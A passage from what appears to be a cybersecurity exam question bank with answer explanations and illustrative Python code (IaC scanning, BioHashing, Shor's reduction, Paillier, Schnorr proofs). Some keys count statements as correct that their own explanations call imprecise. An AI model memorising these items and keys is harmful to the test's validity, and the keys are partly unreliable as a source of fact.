Statement 1 is correct: HSMs are dedicated devices that generate, store and use keys that never leave the module in clear form, and enterprise and cloud HSMs are commonly validated at FIPS 140-2 Level 3, which adds tamper-evident and tamper-resistant physical protection and identity-based operator authentication. (FIPS 140-3 has superseded 140-2 for new validations since 2021, so current procurement should accept either.) Statement 2 is correct: PKCS #11 ('Cryptoki'), begun by RSA Laboratories in 1994 and now maintained by OASIS, is the standard C API through which applications talk to HSMs, smart cards and other cryptographic tokens. Statement 3 is incorrect because the Common Criteria (ISO/IEC 15408) is a general framework for evaluating IT products against protection profiles; HSMs are indeed evaluated under it, and the vulnerability analysis assurance family (AVA_VAN) can include side-channel testing, but it is not a standard dedicated to certifying hardware against electromagnetic side-channel attacks. Physical tamper requirements for HSMs are primarily set by the FIPS 140 security levels.
Consider the following statements regarding Cloud-native security posture management:
1. The concept of 'Shift Left' security, popularized in the 2010 DevOps movement, refers to the practice of moving security testing to the production environment to ensure that cloud-native applications maintain compliance with the 1996 HIPAA technical safeguards.
2. The 2023 Gartner Market Guide for CSPM identifies the automation of remediation workflows as a critical capability for reducing the mean time to detect (MTTD) security drifts in multi-cloud infrastructures.
3. Infrastructure as Code (IaC) scanning tools, such as Checkov or Terrascan, analyze Terraform and CloudFormation templates for security vulnerabilities before the deployment phase begins.
How many of the statements given above are correct?
- Only one
- Only two
- All three
- None
Explanation: Statement 2 is correct. Statement 3 is correct. Statement 1 is incorrect.
Statement 1 is incorrect because 'Shift Left' means moving security testing to the early stages of the software development lifecycle (design, code, build), not into production, so that vulnerabilities are found before deployment; the HIPAA reference is unrelated. Statement 2 is correct: CSPM products emphasize automated remediation of drift (a bucket made public, a security group opened to the world) to shorten the window of exposure in multi-cloud estates; note that automation chiefly reduces the time to remediate, while the time to detect depends on how frequently the CSPM re-evaluates configuration state. Statement 3 is correct because IaC scanners such as Checkov and Terrascan perform static analysis on Terraform, CloudFormation and similar templates to find misconfigurations before any infrastructure is provisioned.
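To show the kind of check such a scanner performs, here is an added example (not Checkov's or Terrascan's code) that walks a constructed CloudFormation template in its JSON form and applies four rules a practitioner would expect; the rule identifiers and the template itself are made up for the demonstration, while the resource types and property names are the real CloudFormation ones.

```python
import json

# Constructed CloudFormation template (JSON form) with three common misconfigurations.
TEMPLATE = json.loads("""
{
  "AWSTemplateFormatVersion": "2010-09-09",
  "Resources": {
    "AdminSg": {"Type": "AWS::EC2::SecurityGroup",
      "Properties": {"GroupDescription": "admin",
        "SecurityGroupIngress": [
          {"IpProtocol": "tcp", "FromPort": 22, "ToPort": 22, "CidrIp": "0.0.0.0/0"},
          {"IpProtocol": "tcp", "FromPort": 443, "ToPort": 443, "CidrIp": "0.0.0.0/0"}]}},
    "Uploads": {"Type": "AWS::S3::Bucket",
      "Properties": {"AccessControl": "PublicRead"}},
    "DataVol": {"Type": "AWS::EC2::Volume",
      "Properties": {"Size": 100, "AvailabilityZone": "eu-west-1a"}},
    "Db": {"Type": "AWS::RDS::DBInstance",
      "Properties": {"Engine": "postgres", "DBInstanceClass": "db.t3.micro",
                     "StorageEncrypted": true, "PubliclyAccessible": false}}
  }
}
""")

ADMIN_PORTS = {22, 3389}
ANY_CIDR = {"0.0.0.0/0", "::/0"}

def _ingress_is_world_admin(rule):
    cidr = rule.get("CidrIp") or rule.get("CidrIpv6")
    if cidr not in ANY_CIDR:
        return False
    if rule.get("IpProtocol") in ("-1", -1):
        return True                                   # all protocols and ports
    lo, hi = rule.get("FromPort", 0), rule.get("ToPort", 65535)
    return any(lo <= port <= hi for port in ADMIN_PORTS)

def check_security_group(name, props):
    for rule in props.get("SecurityGroupIngress", []):
        if _ingress_is_world_admin(rule):
            yield (name, "SG-001", "admin port (22/3389) open to the world")

def check_s3_bucket(name, props):
    acl = props.get("AccessControl")
    if acl in ("PublicRead", "PublicReadWrite", "AuthenticatedRead"):
        yield (name, "S3-001", f"bucket ACL {acl} grants broad access")
    pab = props.get("PublicAccessBlockConfiguration", {})
    if not all(pab.get(k) is True for k in ("BlockPublicAcls", "BlockPublicPolicy",
                                             "IgnorePublicAcls", "RestrictPublicBuckets")):
        yield (name, "S3-002", "public access block not fully enabled")

def check_volume(name, props):
    if props.get("Encrypted") is not True:
        yield (name, "EBS-001", "EBS volume not encrypted")

def check_rds(name, props):
    if props.get("PubliclyAccessible") is True:
        yield (name, "RDS-001", "RDS instance publicly accessible")
    if props.get("StorageEncrypted") is not True:
        yield (name, "RDS-002", "RDS storage not encrypted")

CHECKS = {"AWS::EC2::SecurityGroup": check_security_group, "AWS::S3::Bucket": check_s3_bucket,
          "AWS::EC2::Volume": check_volume, "AWS::RDS::DBInstance": check_rds}

def scan_template(template):
    """Static pass over Resources; returns (logical_id, rule_id, message) tuples.
    Nothing is deployed or queried: this runs in CI before `cloudformation deploy`."""
    findings = []
    for logical_id, resource in template.get("Resources", {}).items():
        check = CHECKS.get(resource.get("Type"))
        if check:
            findings.extend(check(logical_id, resource.get("Properties", {})))
    return findings

if __name__ == "__main__":
    for logical_id, rule_id, message in scan_template(TEMPLATE):
        print(f"{rule_id} {logical_id}: {message}")
```

Real scanners resolve intrinsic functions, parameters and Terraform HCL as well, but the core is the same: resource-type-specific predicates over the declared properties, evaluated before anything exists to exploit.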
Consider the following statements regarding Biometric template protection:
1. The concept of 'Bio-hashing' typically utilizes a user-specific token or key combined with a biometric feature vector to produce a transformed template that can be revoked if compromised.
2. The Secure Multi-Party Computation (SMPC) approach to biometric authentication enables two or more parties to jointly compute the matching score without revealing their respective private biometric templates.
3. Salting in biometric template protection involves appending a random string to the biometric feature vector before hashing, which mitigates the risk of dictionary attacks on the stored template.
How many of the statements given above are correct?
- Only one
- Only two
- All three
- None
Explanation: Statement 1 is correct. Statement 2 is correct. Statement 3 is correct.
Bio-hashing is a cancellable-biometrics technique: the feature vector is projected with a random transform seeded by a user-specific token, so the stored template can be revoked by issuing a new token, and the same biometric yields unrelated templates in different systems. Secure multi-party computation lets the client and the server evaluate the matching function over their private inputs (the live features and the stored template) without either side learning the other's data, giving privacy-preserving verification. Statement 3 is accepted on its intent, with a caveat that matters in practice: a fresh biometric capture never equals the enrolled one bit-for-bit, so a salted cryptographic hash of the raw feature vector would never match. In biometric template protection (the ISO/IEC 24745 taxonomy), 'salting' means mixing user-specific random auxiliary data into the features through a transform that tolerates the natural variation, bio-hashing being the standard example; the random data still prevents pre-computation and cross-database linking, which is the property the statement points at.
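The token-plus-features transform behind statements 1 and 3, as an added example (not from the original page): a simplified BioHashing scheme that projects a constructed feature vector onto random directions seeded by the user's token, keeps only the signs, and matches by Hamming distance. The feature dimension, hash length, noise model, thresholds and seeds are assumptions for the demonstration, and the original scheme's Gram-Schmidt orthonormalisation of the projection is omitted.

```python
import random

FEATURE_DIM = 16        # length of a constructed feature vector (a real one comes from a sensor pipeline)
HASH_BITS = 128         # length of the protected template
MATCH_THRESHOLD = 0.2   # fraction of bits allowed to differ (assumed operating point)

def enrol_features(seed):
    """Constructed 'biometric' feature vector standing in for extracted features."""
    rng = random.Random(seed)
    return [rng.gauss(0.0, 1.0) for _ in range(FEATURE_DIM)]

def noisy_capture(features, seed, sigma=0.05):
    """A fresh capture of the same trait never matches bit-for-bit; model it as small noise."""
    rng = random.Random(seed)
    return [f + rng.gauss(0.0, sigma) for f in features]

def biohash(features, token):
    """BioHashing (simplified): project onto random directions derived from the user's
    token, keep the sign of each projection. Small feature noise rarely flips a sign,
    a different token or different person flips about half of them."""
    rng = random.Random(token)
    bits = []
    for _ in range(HASH_BITS):
        direction = [rng.gauss(0.0, 1.0) for _ in range(FEATURE_DIM)]
        projection = sum(d * f for d, f in zip(direction, features))
        bits.append(1 if projection > 0 else 0)
    return bits

def hamming_fraction(a, b):
    return sum(x != y for x, y in zip(a, b)) / len(a)

def verify(stored_template, live_features, token):
    return hamming_fraction(stored_template, biohash(live_features, token)) <= MATCH_THRESHOLD

# Constructed enrolment: the user's features plus the token kept on their card or in their account.
USER_FEATURES = enrol_features(seed=1001)
USER_TOKEN = 0xC0FFEE
STORED_TEMPLATE = biohash(USER_FEATURES, USER_TOKEN)

def revoke_and_reissue(features, new_token):
    """Cancellability: a leaked template is replaced by one under a new token; the
    old template is unrelated to the new one even though the biometric is unchanged."""
    return biohash(features, new_token)

if __name__ == "__main__":
    live = noisy_capture(USER_FEATURES, seed=7)
    print("genuine user, right token:", verify(STORED_TEMPLATE, live, USER_TOKEN))
    print("impostor features, stolen token:", verify(STORED_TEMPLATE, enrol_features(seed=2002), USER_TOKEN))
    new_template = revoke_and_reissue(USER_FEATURES, new_token=USER_TOKEN + 1)
    print("old token against reissued template:", verify(new_template, live, USER_TOKEN))
    print("new token against reissued template:", verify(new_template, live, USER_TOKEN + 1))
```

Two things the run makes visible: the noisy capture still verifies because the transform tolerates small feature changes, which a plain salted hash would not; and after re-issue the old token is useless against the new template, which is the revocation property a raw biometric can never have.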
Consider the following statements regarding Data Loss Prevention mechanisms:
1. Digital Rights Management (DRM) systems often use the Advanced Encryption Standard (AES) with a 256-bit key length, and these systems are legally recognized as equivalent to data loss prevention controls under the 1996 WIPO Copyright Treaty.
2. The Data Loss Prevention (DLP) architecture known as 'Cloud Access Security Broker' (CASB) provides visibility into SaaS applications, and the 2014 Cloud Security Alliance guidelines classify CASB deployment as a replacement for traditional firewall-based egress filtering.
3. Data-at-rest discovery tools scan storage volumes for specific patterns using regular expressions, and the HIPAA Security Rule of 2003 specifies that such discovery tools are the primary method for ensuring compliance with technical safeguard standards.
How many of the statements given above are correct?
- Only one
- Only two
- All three
- None
Explanation: Statement 1 is incorrect. Statement 2 is incorrect. Statement 3 is incorrect.
Statement 1 is incorrect because, while DRM systems commonly encrypt content with AES, the 1996 WIPO Copyright Treaty obliges signatories to give legal protection to technological protection measures; it does not equate DRM with data loss prevention or standardize DLP controls. Statement 2 is incorrect because a CASB adds visibility and policy enforcement for cloud services as a complementary layer; it does not replace network egress filtering, and no Cloud Security Alliance guidance says otherwise. Statement 3 is incorrect because the HIPAA Security Rule (2003) requires covered entities to implement technical safeguards such as access control, audit controls and transmission security; it does not prescribe data-discovery tools, or any other specific product, as the primary means of compliance.
Consider the following statements regarding Air-gapped Network Security:
1. The NIST Special Publication 800-53 revision 5 framework includes specific controls for physical isolation, defining air-gapped systems as those lacking any physical or logical connection to external networks.
2. USB-based malware propagation remains a primary threat to air-gapped environments, and the 2014 BadUSB vulnerability provided a mechanism for firmware-level infection that was addressed by the IEEE 802.11ac protocol update.
3. Optical exfiltration techniques, such as the 2017 BitWhisper method, allow for data transfer between air-gapped machines using thermal sensors, a process that is recognized under the GDPR Article 32 security requirements.
How many of the statements given above are correct?
- Only one
- Only two
- All three
- None
Explanation: Statement 1 is correct. Statement 2 is incorrect. Statement 3 is incorrect.
Statement 1 is correct as NIST SP 800-53 Rev. 5 treats physical and logical isolation of systems and networks as a foundational control for protecting high-value assets from external network threats. Statement 2 is incorrect because BadUSB (Nohl and Lell, 2014) reprograms a USB device's controller firmware so that it can masquerade as a keyboard or network adapter; IEEE 802.11ac is a Wi-Fi standard and has nothing to do with USB firmware, which remains largely unmitigated at the protocol level and is handled operationally through device allow-listing and port control. Statement 3 is incorrect on three counts: BitWhisper (Ben-Gurion University, 2015) is a thermal covert channel, not an optical one; it dates from 2015, not 2017; and GDPR Article 32 requires 'appropriate' technical and organisational security measures in general terms and neither names nor codifies particular exfiltration techniques.
Consider the following statements regarding Post-Quantum Cryptography:
1. NIST finalized the FIPS 203 standard in August 2024, which specifies the ML-KEM algorithm for key encapsulation mechanisms.
2. Shor's algorithm, formulated in 1994, demonstrates that a sufficiently powerful fault-tolerant quantum computer could factor large integers, thereby compromising RSA encryption.
3. The transition to post-quantum standards is often referred to as 'Q-Day' or 'Y2Q', representing the theoretical point where current public-key infrastructure becomes vulnerable.
How many of the statements given above are correct?
- Only one
- Only two
- All three
- None
Explanation: Statement 1 is correct. Statement 2 is correct. Statement 3 is correct.
Statement 1 is correct: on 13 August 2024 NIST published FIPS 203 (ML-KEM, derived from CRYSTALS-Kyber), alongside FIPS 204 (ML-DSA, from Dilithium) and FIPS 205 (SLH-DSA, from SPHINCS+). Statement 2 is correct because Shor's algorithm solves integer factorization and discrete logarithms in polynomial time on a fault-tolerant quantum computer, which would break RSA, finite-field Diffie-Hellman and elliptic-curve cryptography alike. Statement 3 is correct in its second clause: 'Q-Day' and 'Y2Q' denote the point at which a cryptographically relevant quantum computer can break today's public-key algorithms; strictly, the terms name that break rather than the migration to post-quantum standards, which is usually just called the PQC transition.
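Shor's reduction from factoring to order finding, as an added example (not from the original page) serving both this question and the earlier one on Shor's algorithm: everything except the order-finding step is classical and shown here in full, with the order found by brute force in place of the quantum Fourier-transform step, which is the part that provides the quantum speedup. The sample moduli (15, the number factored in the 2001 demonstration, and 3233) are chosen for the demo.

```python
from math import gcd
from random import Random

def find_order(a, n):
    """Smallest r > 0 with a^r == 1 (mod n). Brute force here: this is the one step Shor's
    algorithm hands to the quantum computer (quantum Fourier transform over a register of
    modular exponentiations), which finds r in time polynomial in log n."""
    r, value = 1, a % n
    while value != 1:
        value = (value * a) % n
        r += 1
        if r > n:                 # cannot happen when gcd(a, n) == 1
            return None
    return r

def factor_from_order(n, a):
    """The classical reduction: a non-trivial factor of n from the order of a, or None
    if this base is unlucky (odd order, or a^(r/2) == -1 mod n)."""
    g = gcd(a, n)
    if g != 1:
        return g                  # lucky guess, a already shares a factor with n
    r = find_order(a, n)
    if r is None or r % 2:
        return None
    y = pow(a, r // 2, n)         # y^2 == 1 (mod n) with y != 1
    if y == n - 1:
        return None               # y == -1: gcd(y - 1, n) and gcd(y + 1, n) are both trivial
    f = gcd(y - 1, n)
    return f if 1 < f < n else None

def factor(n, seed=1, attempts=100):
    """Retry with random bases until the reduction succeeds; for an odd n with two
    distinct prime factors a random base works with probability at least 1/2."""
    rng = Random(seed)
    for _ in range(attempts):
        f = factor_from_order(n, rng.randrange(2, n))
        if f:
            return f, n // f
    return None

if __name__ == "__main__":
    print("order of 7 mod 15:", find_order(7, 15), "-> factor", factor_from_order(15, 7))
    print("3233 =", factor(3233))
```

For n = 15 and base 7 the order is 4, 7^2 = 49 = 4 (mod 15), and gcd(4 - 1, 15) = 3: exactly the arithmetic the 7-qubit experiment performed. Replace the brute-force loop with quantum period finding and the whole procedure runs in polynomial time, which is why RSA moduli of any size fall to it.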
Consider the following statements regarding Homomorphic Encryption:
1. The BFV scheme, introduced in 2012, is based on the Ring Learning With Errors problem and is designed to process Boolean circuits through the use of elliptic curve cryptography.
2. The Zama research initiative, established in 2020, focuses on hardware acceleration for homomorphic encryption and relies on the AES-256 block cipher for its core algebraic operations.
3. Homomorphic encryption provides for the preservation of data integrity during transit, and it is currently the primary standard for securing communication under the 2016 GDPR technical guidelines.
How many of the statements given above are correct?
- Only one
- Only two
- All three
- None
Explanation: Statement 1 is incorrect. Statement 2 is incorrect. Statement 3 is incorrect.
Statement 1 is incorrect because BFV (Brakerski 2012; Fan and Vercauteren 2012) is a lattice scheme over Ring-LWE that performs modular addition and multiplication on encrypted integers (and on packed vectors of them); elliptic curves play no part in it, and Boolean-circuit evaluation is the natural domain of schemes such as FHEW and TFHE. Statement 2 is incorrect because Zama builds FHE software (its Concrete library and TFHE-rs are built on TFHE, a scheme over the torus) rather than relying on AES-256; AES appears in FHE work only as a benchmark circuit to evaluate homomorphically, not as the scheme's algebraic core. Statement 3 is incorrect because homomorphic encryption is about letting an untrusted party compute on ciphertexts without decrypting them (data in use); it is not an integrity or transport mechanism, and GDPR does not mandate any specific encryption scheme.
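To show what computing on ciphertexts without decrypting them means, here is an added example (not from the original page and not one of the lattice schemes it names): the Paillier cryptosystem, which is only additively homomorphic and far simpler than BFV or TFHE, with constructed toy-sized primes. The same block scores an encrypted biometric template without the server seeing it, the use case the page's last question raises.

```python
import random
from math import gcd

def lcm(a, b):
    return a * b // gcd(a, b)

class Paillier:
    """Additively homomorphic Paillier encryption over n = p*q. The primes used below are
    constructed toy values; real deployments use 2048-bit or larger moduli."""

    def __init__(self, p, q, seed=11):
        self.n = p * q
        self.n2 = self.n * self.n
        self.g = self.n + 1                       # standard simple generator choice
        self.lam = lcm(p - 1, q - 1)              # private key
        self.mu = pow(self._L(pow(self.g, self.lam, self.n2)), -1, self.n)
        self.rng = random.Random(seed)

    def _L(self, u):
        return (u - 1) // self.n

    def encrypt(self, m):
        """Public-key operation: needs only n and g. Fresh randomness r makes two
        encryptions of the same value look unrelated."""
        r = self.rng.randrange(1, self.n)
        while gcd(r, self.n) != 1:
            r = self.rng.randrange(1, self.n)
        return pow(self.g, m, self.n2) * pow(r, self.n, self.n2) % self.n2

    def decrypt(self, c):
        return self._L(pow(c, self.lam, self.n2)) * self.mu % self.n

    # The homomorphisms: anyone holding ciphertexts can do these without the private key.
    def add(self, c1, c2):
        return c1 * c2 % self.n2                  # E(a) * E(b) = E(a + b)

    def mul_plain(self, c, k):
        return pow(c, k, self.n2)                 # E(a)^k = E(k * a)

def encrypted_dot_product(pk, enc_template, probe):
    """Matching score on an encrypted template: the server holds E(t_i) and a plaintext
    probe p and computes E(sum_i t_i * p_i) without ever learning t. Only the key holder
    can open the result."""
    acc = pk.encrypt(0)
    for c, p in zip(enc_template, probe):
        acc = pk.add(acc, pk.mul_plain(c, p))
    return acc

KEY = Paillier(10007, 10009)                      # constructed toy primes

if __name__ == "__main__":
    c7, c5 = KEY.encrypt(7), KEY.encrypt(5)
    print("E(7) * E(5) decrypts to", KEY.decrypt(KEY.add(c7, c5)))
    enc_template = [KEY.encrypt(v) for v in [3, 1, 4, 1, 5]]      # constructed template
    score = encrypted_dot_product(KEY, enc_template, [2, 0, 1, 1, 3])
    print("<t, p> computed on ciphertexts:", KEY.decrypt(score))
```

Paillier supports addition of ciphertexts and multiplication by plaintext constants but not multiplication of two ciphertexts; fully homomorphic schemes such as BFV and TFHE add that missing operation (with a noise budget to manage), which is what lets them evaluate arbitrary circuits.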
Consider the following statements regarding Blockchain-based Identity Management:
1. The Sovrin Network, launched in 2016, operates as a public permissioned ledger specifically designed to support the governance of global digital identity ecosystems.
2. Hyperledger Indy, a project hosted by the Linux Foundation, provides modular tools and libraries to build and use independent digital identities on distributed ledgers.
3. Zero-Knowledge Proofs (ZKPs) in blockchain identity management allow a user to verify their age or citizenship status to a verifier without disclosing the underlying personal data.
How many of the statements given above are correct?
- Only one
- Only two
- All three
- None
Explanation: Statement 1 is correct. Statement 2 is correct. Statement 3 is correct.
The Sovrin Network, launched in 2016, is a public permissioned ledger governed by the non-profit Sovrin Foundation to facilitate self-sovereign identity. Hyperledger Indy is an open-source project under the Linux Foundation that provides decentralized identity-specific tools, while Zero-Knowledge Proofs (ZKPs) enable cryptographic verification of attributes (like age or eligibility) without revealing the specific data points, thereby enhancing user privacy. All three statements are factually accurate, reflecting the core components of modern decentralized identity frameworks.
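As an added example (not from the original page, Sovrin or Hyperledger Indy) of the principle behind statement 3: a Schnorr proof of knowledge, the simplest sigma protocol, over a constructed toy-sized group. Anonymous-credential systems build more elaborate proofs on the same structure (range proofs for 'over 18', selective disclosure of attributes), but the commit, challenge, response pattern and the reason it leaks nothing are the same.

```python
import hashlib
import random

# Toy-sized Schnorr group (constructed): P = 2*Q + 1, G generates the order-Q subgroup.
# Real systems use a 256-bit elliptic-curve group or a 2048-bit-plus modulus.
P = 2039
Q = 1019
G = 4

def _challenge(*values):
    """Fiat-Shamir: the verifier's random challenge is replaced by a hash of the transcript."""
    digest = hashlib.sha256("|".join(str(v) for v in values).encode()).digest()
    return int.from_bytes(digest, "big") % Q

def keygen(seed=5):
    rng = random.Random(seed)
    x = rng.randrange(1, Q)                   # the holder's secret (e.g. a credential's link secret)
    return x, pow(G, x, P)                    # public value y = g^x

def prove(x, y, seed=9):
    """Prover: demonstrate knowledge of x with y = g^x, revealing only (t, s)."""
    rng = random.Random(seed)
    k = rng.randrange(1, Q)                   # fresh nonce; reusing it across proofs would leak x
    t = pow(G, k, P)                          # commitment
    c = _challenge(G, y, t)                   # challenge
    s = (k + c * x) % Q                       # response
    return t, s

def verify(y, proof):
    t, s = proof
    c = _challenge(G, y, t)
    return pow(G, s, P) == t * pow(y, c, P) % P

def simulate(y, seed=3):
    """Why this is zero-knowledge: an accepting transcript can be produced WITHOUT x by
    choosing s and c first and solving for t = g^s * y^(-c). In the interactive protocol
    (verifier picks c after seeing t) real and simulated transcripts are identically
    distributed, so a proof teaches the verifier nothing it could not have made itself."""
    rng = random.Random(seed)
    s, c = rng.randrange(1, Q), rng.randrange(1, Q)
    t = pow(G, s, P) * pow(pow(y, c, P), -1, P) % P
    return t, c, s

def verify_interactive(y, t, c, s):
    return pow(G, s, P) == t * pow(y, c, P) % P

if __name__ == "__main__":
    x, y = keygen()
    proof = prove(x, y)
    print("public y:", y, "proof (t, s):", proof, "verifies:", verify(y, proof))
    t, c, s = simulate(y)
    print("simulated transcript verifies interactively:", verify_interactive(y, t, c, s))
```

The verifier checks one equation and learns y, t and s, none of which determines x; in a credential system the same mechanism lets a holder prove 'I hold a credential signed by this issuer whose birth-date attribute satisfies a predicate' while disclosing neither the attribute nor a linkable identifier.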
Consider the following statements regarding Data Loss Prevention mechanisms:
1. Endpoint DLP agents typically operate at the kernel level to monitor file system activity, and the Windows Filtering Platform (WFP) API allows these agents to intercept network packets before they reach the TCP/IP stack.
2. The Payment Card Industry Data Security Standard (PCI DSS) version 4.0, released in 2022, includes specific clauses that forbid the use of tokenization as a substitute for end-to-end encryption in merchant point-of-sale systems.
3. The Data Security Council of India (DSCI) released the 'Framework for Data Protection' in 2015, which classifies all financial transaction logs as sensitive personal data under the Information Technology Act of 2000.
How many of the statements given above are correct?
- Only one
- Only two
- All three
- None
Explanation: Statement 1 is incorrect. Statement 2 is incorrect. Statement 3 is incorrect.
Statement 1 is incorrect in its WFP detail: Windows Filtering Platform callout drivers are invoked from filtering layers inside the Windows TCP/IP stack (the ALE, transport and network layers, for example), not before traffic reaches it; interception below the stack is the role of NDIS filter drivers. Kernel-level file-system monitoring by DLP agents uses a different mechanism again, file-system minifilter drivers registered with the Filter Manager. Statement 2 is false because PCI DSS v4.0 (released March 2022) treats tokenization as a recognised way to remove cardholder data from systems and reduce scope; it does not forbid it as a substitute for encryption. Statement 3 is incorrect because the DSCI framework is a voluntary industry guideline and cannot make legal classifications; under the IT Act, 2000 sensitive personal data is defined by the 2011 SPDI Rules (which list items such as passwords, financial information and health records), not by DSCI documents.
Consider the following statements regarding Steganography detection techniques:
1. The StegExpose tool, released in 2016, utilizes a multi-bit LSB detection algorithm capable of analyzing multiple image formats simultaneously to identify potential hidden payloads.
2. Blind steganalysis refers to the application of machine learning classifiers trained on specific embedding algorithms, such as F5 or OutGuess, to detect hidden information in high-resolution digital files.
3. The DCT (Discrete Cosine Transform) coefficient analysis is a primary method for detecting steganography in BMP files, as it identifies anomalies in the frequency domain created by spatial embedding.
How many of the statements given above are correct?
- Only one
- Only two
- All three
- None
Explanation: Statement 1 is correct. Statement 2 is incorrect. Statement 3 is incorrect.
Statement 1 is correct: StegExpose is an open-source tool for bulk detection of LSB steganography in images; it fuses several established LSB detectors (sample pairs, RS analysis, chi-square and primary sets) into one score and runs over a directory of images in common formats. Statement 2 is incorrect because blind (universal) steganalysis is precisely the class of methods that does not assume a particular embedding algorithm, typically training a classifier on generic statistical features; a detector trained for F5 or OutGuess specifically is targeted steganalysis. Statement 3 is incorrect because DCT coefficient analysis is the natural tool for JPEG, where the payload is embedded in quantized frequency-domain coefficients; BMP stores raw pixels, and spatial-domain embedding in it is analysed with spatial statistics such as histogram pair tests or RS analysis.
Consider the following statements regarding Quantum Key Distribution:
1. The National Quantum Mission, approved by the Union Cabinet in April 2023, allocates a budget of ₹6,003 crore for the development of quantum computers, with a specific provision for the deployment of a 2,000-kilometer terrestrial QKD network across the Himalayan border.
2. The 2016 launch of the Micius satellite by the Chinese Academy of Sciences facilitated the first intercontinental quantum-secured video call between Beijing and Vienna, utilizing the E91 protocol for entanglement-based key distribution.
3. The Tokyo QKD Network, operational since 2010, serves as the world's first multi-node quantum network, integrating the SARG04 protocol to enable secure data transmission between the National Institute of Information and Communications Technology and various commercial banking partners.
How many of the statements given above are correct?
- Only one
- Only two
- All three
- None
Explanation: Statement 1 is incorrect. Statement 2 is incorrect. Statement 3 is incorrect.
Statement 1 is incorrect because while the National Quantum Mission has a budget of ₹6,003 crore, it targets a 2,000-kilometer QKD network across India, not specifically the Himalayan border. Statement 2 is incorrect because the Micius satellite utilized the BB84 protocol for its landmark 2017 intercontinental video call, not the E91 protocol. Statement 3 is incorrect because the Tokyo QKD Network, while a pioneer, primarily utilized the BB84 protocol rather than SARG04 for its operational key distribution.
Consider the following statements regarding Biometric template protection:
1. Homomorphic encryption allows for the comparison of biometric templates in the encrypted domain, ensuring that the raw biometric data remains hidden from the matching server.
2. The ISO/IEC 24745 standard, published in 2011, provides a framework for the protection of biometric information and outlines requirements for secure biometric template storage.
3. Fuzzy extractors, introduced by Dodis et al. in 2004, allow for the generation of a stable cryptographic key from noisy biometric inputs by using error-correcting codes.
How many of the statements given above are correct?
- Only one
- Only two
- All three
- None
Explanation: Statement 1 is correct. Statement 2 is correct. Statement 3 is correct.
Statement 1 is correct because homomorphic encryption enables mathematical operations on ciphertext, allowing biometric matching without decryption. Statement 2 is correct as ISO/IEC 24745:2011 is the internationally recognized standard specifically designed to protect the confidentiality and integrity of biometric templates during storage and transmission. Statement 3 is correct because fuzzy extractors address the inherent variability in biometric data by using error-correcting codes to derive consistent cryptographic keys from noisy inputs, a concept formalized by Dodis et al. in 2004.
Consider the following statements regarding Zero Trust Architecture:
1. Continuous Diagnostics and Mitigation (CDM) programs provide for real-time asset monitoring, and these tools serve as the foundational authentication layer for Zero Trust network access (ZTNA).
2. The principle of 'Least Privilege' is derived from the Bell-LaPadula model, which focuses on data integrity in multi-level security systems for military networks.
3. Software-Defined Perimeter (SDP) architecture utilizes a 'black cloud' approach to hide network resources, and this method relies on the BGP routing protocol to verify user identities.
How many of the statements given above are correct?
- Only one
- Only two
- All three
- None
Explanation: Statement 1 is incorrect. Statement 2 is incorrect. Statement 3 is incorrect.
Statement 1 is incorrect because CDM programs focus on vulnerability management rather than serving as the foundational authentication layer for ZTNA, which relies on Identity and Access Management (IAM) systems. Statement 2 is incorrect because the 'Least Privilege' principle is a general security concept, whereas the Bell-LaPadula model specifically focuses on data confidentiality (preventing unauthorized read access) rather than integrity. Statement 3 is incorrect because while SDP uses a 'black cloud' to hide resources, it relies on mutual TLS (mTLS) and pre-authentication protocols to verify identities, not the BGP routing protocol, which is used for inter-domain routing.
Consider the following statements regarding Cross-Site Scripting Mitigation:
1. The Content-Type Options header, established in the 2009 Internet Explorer 8 release, serves to prevent MIME-type sniffing and serves as the primary defense against stored Cross-Site Scripting in legacy web frameworks.
2. The OWASP Top 10 project, which first identified Cross-Site Scripting as a critical vulnerability in 2003, recommends the use of context-aware output encoding to neutralize malicious payloads.
3. The 'HttpOnly' flag, introduced by Microsoft in Internet Explorer 6 SP1 in 2002, prevents client-side scripts from accessing sensitive session cookies via the document.cookie API.
How many of the statements given above are correct?
- Only one
- Only two
- All three
- None
Explanation: Statement 2 is correct. Statement 3 is correct. Statement 1 is incorrect.
Statement 1 is incorrect because the X-Content-Type-Options header prevents MIME-type sniffing to stop browsers from executing non-executable files as scripts, but it is not a defense against stored Cross-Site Scripting. Statement 2 is correct as the OWASP Top 10 has consistently categorized XSS as a critical risk since its 2003 inception, advocating context-aware output encoding to treat untrusted data as content rather than executable code. Statement 3 is correct because the 'HttpOnly' flag, introduced by Microsoft in 2002, restricts cookie access from the document.cookie API, effectively mitigating session hijacking via XSS.
Consider the following statements regarding Air-gapped Network Security:
1. Acoustic bridging, as demonstrated in the 2013 Fansmitter research, allows for data exfiltration from air-gapped computers by manipulating internal fan speeds to transmit binary data over ultrasonic frequencies.
2. The 2015 Operation Olympic Games report details how air-gapped networks in military command centers utilize specialized hardware security modules, which are regulated under the Wassenaar Arrangement for dual-use technologies.
3. The Stuxnet worm, identified in 2010, successfully compromised air-gapped industrial control systems at the Natanz nuclear facility by leveraging a vulnerability in Windows shortcut files.
How many of the statements given above are correct?
- Only one
- Only two
- All three
- None
Explanation: Statement 3 is correct. Statement 1 is incorrect. Statement 2 is incorrect.
Statement 3 is correct because the 2010 Stuxnet worm successfully breached the Natanz facility's air-gapped systems by exploiting a zero-day vulnerability in Windows LNK shortcut files via infected USB drives. Statement 1 is incorrect because the 'Fansmitter' research was published in 2016, not 2013, by researchers at Ben-Gurion University. Statement 2 is incorrect because 'Operation Olympic Games' refers to the clandestine cyber-operation against Iran's nuclear program, not a report on hardware security modules regulated by the Wassenaar Arrangement.
Consider the following statements regarding Homomorphic Encryption:
1. The CKKS scheme, introduced in 2017, is optimized for approximate arithmetic on encrypted floating-point numbers, making it suitable for machine learning applications.
2. Craig Gentry proposed the first fully homomorphic encryption scheme in 2009, utilizing lattice-based cryptography to enable arbitrary computations on encrypted data.
3. Homomorphic encryption is categorized into three levels (Partial, Somewhat, and Fully) based on the number and type of operations permitted on the ciphertext.
How many of the statements given above are correct?
- Only one
- Only two
- All three
- None
Explanation: Statement 1 is correct. Statement 2 is correct. Statement 3 is correct.
All three statements are correct: the CKKS scheme (2017) is a landmark in privacy-preserving machine learning due to its support for approximate arithmetic on floating-point numbers, while Craig Gentry's 2009 breakthrough utilized lattice-based cryptography to solve the long-standing problem of fully homomorphic encryption (FHE). Furthermore, homomorphic encryption is indeed classified into Partial (PHE), Somewhat (SWHE), and Fully (FHE) categories based on the depth and variety of algebraic operations (addition and multiplication) allowed on ciphertexts without decryption.
Consider the following statements regarding Quantum Key Distribution:
